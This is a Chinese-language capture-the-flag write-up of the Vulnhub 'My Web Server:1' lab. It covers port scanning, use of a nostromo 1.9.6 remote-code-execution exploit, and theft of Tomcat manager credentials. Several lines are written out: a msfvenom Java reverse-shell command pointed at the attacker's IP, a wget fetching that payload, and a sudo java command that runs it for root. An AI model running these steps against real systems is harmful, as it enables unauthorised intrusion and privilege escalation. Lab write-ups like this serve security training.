Vulnhub My Web Server:1—Writeup

Get Boxhttps://www.vulnhub.com/entry/my-web-server-1,463/

 Vulnhub My Web Server:1—Writeup 第1张

下载好OVF后直接导入虚拟机即可

Vulnhub My Web Server:1—Writeup 第2张

不错 可以直接看到IP,那么就打开kali linux开始吧

Vulnhub My Web Server:1—Writeup 第3张

打开卡里二话不说直接一顿NMAP

Vulnhub My Web Server:1—Writeup 第4张

可以很清楚的看到22,80,2222,3306,8009,8080,还有8081端口开放

Vulnhub My Web Server:1—Writeup 第5张

查看80端口 还有8080 80801 2222

Vulnhub My Web Server:1—Writeup 第6张

Vulnhub My Web Server:1—Writeup 第7张

随便尝试一下看看是否存在默认密码等

很明显 失败了

Vulnhub My Web Server:1—Writeup 第8张

再看看8081端口

Vulnhub My Web Server:1—Writeup 第9张

Vulnhub My Web Server:1—Writeup 第10张

类似于一个博客吧

再看看2222端口

Vulnhub My Web Server:1—Writeup 第11张

Vulnhub My Web Server:1—Writeup 第12张

哦天呐 太多好看的小姐姐了吧

Vulnhub My Web Server:1—Writeup 第13张

也是一个类似博客的网页

那么现在就直接进入正题吧 通过dirb nikto searchsploit等工具的信息收集发现 searchsploit发现2222号端口的nostromo1.9.6有远程代码执行漏洞

 

dirb大量的扫描结果

Vulnhub My Web Server:1—Writeup 第14张

nikto扫描结果

Vulnhub My Web Server:1—Writeup 第15张

Searchsploit扫描结果

Vulnhub My Web Server:1—Writeup 第16张

关于这个nostromo我在看雪论坛也发现一篇翻译的文章 有兴趣可以去看看(https://bbs.pediy.com/thread-256798.htm

 

首先cp

Vulnhub My Web Server:1—Writeup 第17张

Vulnhub My Web Server:1—Writeup 第18张

直接python会报错 我开始还以为是程序问题 后来发现直接注释掉就行

Vulnhub My Web Server:1—Writeup 第19张

Vulnhub My Web Server:1—Writeup 第20张

用法比较简单 就是IP +端口 + 命令

先试试python 47837.py 192.168.0.100 2222 whoami

Vulnhub My Web Server:1—Writeup 第21张

python 47837.py 192.168.0.100 2222 id 

Vulnhub My Web Server:1—Writeup 第22张

那么先GETSHELL

 kali自带的

Vulnhub My Web Server:1—Writeup 第23张

Vulnhub My Web Server:1—Writeup 第24张

改自己卡里IP和你要的端口 随意奥

启动阿帕奇

Vulnhub My Web Server:1—Writeup 第25张

Vulnhub My Web Server:1—Writeup 第26张

Vulnhub My Web Server:1—Writeup 第27张

Nc start

Vulnhub My Web Server:1—Writeup 第28张

Vulnhub My Web Server:1—Writeup 第29张

Vulnhub My Web Server:1—Writeup 第30张

然后python -c import pty;pty.spawn(/bin/bash)

Vulnhub My Web Server:1—Writeup 第31张

Vulnhub My Web Server:1—Writeup 第32张

Vulnhub My Web Server:1—Writeup 第33张

通过查看tomcat-users.xml可以发现TOMCAT的管理后台密码

 Vulnhub My Web Server:1—Writeup 第34张

Vulnhub My Web Server:1—Writeup 第35张

msfvenom生成一个war

然后上传即可


Vulnhub My Web Server:1—Writeup 第36张

然后访问http://192.168.0.100:8080/exp/

Vulnhub My Web Server:1—Writeup 第37张

Vulnhub My Web Server:1—Writeup 第38张

Vulnhub My Web Server:1—Writeup 第39张

现在已经切换到了TOMCAT用户 其实本来不想这么麻烦的 只是我试了一下直接切换TOMCAT用户 能用到的密码都失败了

 

Sudo -l

Vulnhub My Web Server:1—Writeup 第40张

msfvenom -p java/shell_reverse_tcp LHOST=192.168.0.108 LPORT=7775 -f jar > expjar.jar

启动NC监听并把生成的jar复制到var/www/html目录下

Vulnhub My Web Server:1—Writeup 第41张

Wget http://192.168.0.108/expjar.jar

Vulnhub My Web Server:1—Writeup 第42张

然后sudo /usr/lib/jvm/adoptopenjdk-8-hotspot-amd64/bin/java -jar ./expjar.jar

Vulnhub My Web Server:1—Writeup 第43张

Vulnhub My Web Server:1—Writeup 第44张Vulnhub My Web Server:1—Writeup 第45张


完!


博客:Blog.CatGames.cn

邮箱:root@R0inSecurity.com